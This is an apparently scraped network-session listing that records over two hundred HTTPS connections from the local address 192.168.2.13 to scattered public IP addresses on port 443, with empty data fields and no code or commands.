                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17934192.168.2.134954025.65.179.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17935192.168.2.1338886136.69.213.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17936192.168.2.1353520112.146.30.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17937192.168.2.134433862.100.99.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17938192.168.2.134327813.71.166.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17939192.168.2.1345938134.110.136.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17940192.168.2.133528073.42.236.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17941192.168.2.1340742177.105.29.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17942192.168.2.133827875.15.153.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17943192.168.2.1358046191.132.46.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17944192.168.2.1339936171.14.167.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17945192.168.2.1349722100.255.113.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17946192.168.2.134314892.65.241.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17947192.168.2.1359954107.222.145.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17948192.168.2.1356682193.219.141.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17949192.168.2.1351290159.195.65.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17950192.168.2.1358444173.110.108.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17951192.168.2.134123087.239.75.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17952192.168.2.133859247.29.212.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17953192.168.2.1336006115.119.249.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17954192.168.2.135154427.81.174.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17955192.168.2.134415847.17.54.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17956192.168.2.136030418.85.170.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17957192.168.2.1343756148.201.249.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17958192.168.2.135025619.55.60.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17959192.168.2.135891225.56.69.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17960192.168.2.1336246156.203.51.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17961192.168.2.1335352189.80.190.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17962192.168.2.1337070135.167.45.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17963192.168.2.1358948154.207.223.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17964192.168.2.1358832202.201.140.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17965192.168.2.1359270211.149.233.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17966192.168.2.1358748131.156.58.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17967192.168.2.133965632.93.246.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17968192.168.2.1359118198.66.128.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17969192.168.2.1339200162.40.105.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17970192.168.2.13537449.26.161.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17971192.168.2.13339784.212.6.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17972192.168.2.135427080.192.145.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17973192.168.2.133601017.115.150.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17974192.168.2.1341098135.238.237.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17975192.168.2.1354766202.83.169.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17976192.168.2.134111036.51.199.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17977192.168.2.1348650205.57.188.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17978192.168.2.1334232166.84.14.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17979192.168.2.1337910149.89.182.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17980192.168.2.1334376152.14.24.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17981192.168.2.1342106143.33.173.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17982192.168.2.1356828163.197.143.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17983192.168.2.134990637.126.240.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17984192.168.2.134546286.220.180.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17985192.168.2.133801457.129.194.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17986192.168.2.1349388130.253.172.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17987192.168.2.1349492145.171.145.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17988192.168.2.133845699.150.64.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17989192.168.2.133584276.32.18.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17990192.168.2.133533819.99.210.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17991192.168.2.1340800202.46.203.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17992192.168.2.135583467.95.64.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17993192.168.2.134342258.104.199.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17994192.168.2.133566662.170.31.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17995192.168.2.134083493.46.5.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17996192.168.2.1343022217.230.152.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17997192.168.2.133588490.200.24.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17998192.168.2.134891664.224.151.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17999192.168.2.1351274191.190.138.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18000192.168.2.134675091.3.141.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18001192.168.2.133900898.107.209.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18002192.168.2.135581695.222.159.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18003192.168.2.134453212.245.188.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18004192.168.2.1357486141.75.13.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18005192.168.2.134005639.204.59.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18006192.168.2.1359612141.0.228.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18007192.168.2.1343718179.64.39.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18008192.168.2.134623296.225.202.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18009192.168.2.1338264216.64.253.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18010192.168.2.134929284.91.234.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18011192.168.2.1347276160.66.131.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18012192.168.2.133456481.120.40.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18013192.168.2.1356404181.177.107.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18014192.168.2.1352718162.52.133.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18015192.168.2.135125695.218.106.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18016192.168.2.1334904139.31.192.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18017192.168.2.134593014.240.225.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18018192.168.2.1359808186.198.191.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18019192.168.2.13466809.255.138.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18020192.168.2.135087272.238.82.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18021192.168.2.135255698.88.220.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18022192.168.2.135345838.103.110.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18023192.168.2.135681843.77.73.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18024192.168.2.1354944168.58.233.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18025192.168.2.1351554117.151.215.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18026192.168.2.1360308110.196.56.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18027192.168.2.133905651.1.212.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18028192.168.2.133450847.42.219.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18029192.168.2.134323285.249.167.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18030192.168.2.1340394201.161.186.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18031192.168.2.1343658182.197.251.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18032192.168.2.1333102124.58.120.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18033192.168.2.1340890159.47.190.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18034192.168.2.13510068.152.10.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18035192.168.2.1359828200.50.22.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18036192.168.2.1337052152.53.18.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18037192.168.2.1356150102.197.43.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18038192.168.2.1342048172.164.216.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18039192.168.2.134902281.22.107.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18040192.168.2.1344528105.187.9.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18041192.168.2.1343052146.90.7.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18042192.168.2.1350838142.126.31.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18043192.168.2.133769483.243.215.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18044192.168.2.133614246.74.48.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18045192.168.2.134612436.230.37.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18046192.168.2.1338206135.50.151.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18047192.168.2.136065682.79.152.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18048192.168.2.1354726117.40.208.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18049192.168.2.1360810223.172.126.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18050192.168.2.1350246187.107.210.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18051192.168.2.133885868.207.212.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18052192.168.2.133542464.233.162.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18053192.168.2.135283440.93.192.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18054192.168.2.1359486179.73.43.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18055192.168.2.1345186193.193.121.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18056192.168.2.1344212211.14.229.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18057192.168.2.135426295.216.52.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18058192.168.2.1345516131.225.204.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18059192.168.2.1334974222.84.73.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18060192.168.2.135203032.18.255.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18061192.168.2.1344456115.255.56.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18062192.168.2.1336600140.126.166.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18063192.168.2.134550014.230.134.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18064192.168.2.1337956205.161.198.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18065192.168.2.135265217.66.97.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18066192.168.2.134787660.66.19.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18067192.168.2.134866071.223.160.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18068192.168.2.1350778191.57.12.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18069192.168.2.135215820.189.159.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18070192.168.2.133330694.45.148.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18071192.168.2.1337758185.16.76.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18072192.168.2.1333800102.110.82.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18073192.168.2.134814279.180.125.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18074192.168.2.1345708160.181.152.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18075192.168.2.13519509.60.215.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18076192.168.2.135905073.178.164.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18077192.168.2.1351434135.243.236.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18078192.168.2.1355426170.113.122.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18079192.168.2.135965090.250.245.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18080192.168.2.1342046104.174.13.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18081192.168.2.134188223.36.19.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18082192.168.2.1336976136.12.105.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18083192.168.2.1360588166.22.42.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18084192.168.2.1333240118.42.13.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18085192.168.2.13332164.4.104.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18086192.168.2.1360702159.200.239.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18087192.168.2.1335660141.80.204.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18088192.168.2.1340648170.75.31.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18089192.168.2.1334380125.165.149.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18090192.168.2.13609261.136.180.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18091192.168.2.1348150210.251.233.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18092192.168.2.1352596116.236.251.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18093192.168.2.1336928121.198.162.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18094192.168.2.1354360132.120.32.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18095192.168.2.134874698.247.41.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18096192.168.2.135798857.118.101.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18097192.168.2.135299637.14.44.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18098192.168.2.1343476157.95.85.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18099192.168.2.1343062176.198.252.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18100192.168.2.1357162105.249.82.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18101192.168.2.1359852136.139.70.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18102192.168.2.134689843.24.41.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18103192.168.2.133393269.37.48.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18104192.168.2.1347372114.128.145.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18105192.168.2.1335682120.159.66.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18106192.168.2.133953846.5.156.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18107192.168.2.1334464116.80.150.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18108192.168.2.134713237.91.133.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18109192.168.2.1358610188.186.138.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18110192.168.2.1358542129.47.121.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18111192.168.2.1350962199.190.21.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18112192.168.2.1345048198.116.60.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18113192.168.2.1358952159.216.239.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18114192.168.2.134731263.235.14.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18115192.168.2.1355020198.55.184.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18116192.168.2.1353290187.14.133.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18117192.168.2.134992058.149.62.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18118192.168.2.135149666.213.114.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18119192.168.2.135951679.212.23.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18120192.168.2.135571665.8.143.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18121192.168.2.1344608126.161.225.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18122192.168.2.134126019.188.80.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18123192.168.2.133855240.147.58.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18124192.168.2.136095495.107.155.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18125192.168.2.133993841.248.197.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18126192.168.2.1338516140.203.69.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18127192.168.2.1359336110.40.236.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18128192.168.2.1345998168.225.129.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18129192.168.2.1339034216.213.46.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18130192.168.2.134857482.71.53.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18131192.168.2.1352418221.153.253.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18132192.168.2.135898279.193.95.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18133192.168.2.135154451.111.29.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18134192.168.2.1334208181.70.236.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18135192.168.2.134041635.199.186.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18136192.168.2.1347424116.178.8.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18137192.168.2.1338936202.195.152.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18138192.168.2.1357742142.9.85.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18139192.168.2.133607850.202.43.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18140192.168.2.1349778220.245.159.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18141192.168.2.1353928130.144.66.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18142192.168.2.1351820133.73.199.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18143192.168.2.134046461.32.93.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18144192.168.2.1355334105.126.79.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18145192.168.2.1334782106.46.251.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18146192.168.2.13440709.18.86.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18147192.168.2.13368821.167.235.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18148192.168.2.134665239.223.234.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18149192.168.2.1356848180.110.74.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18150192.168.2.134249498.96.195.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18151192.168.2.133329095.146.207.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18152192.168.2.133965854.119.233.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18153192.168.2.1349334104.93.182.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18154192.168.2.1341258202.183.235.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18155192.168.2.1343564178.127.131.215443
                                        TimestampBytes transferredDirectionData


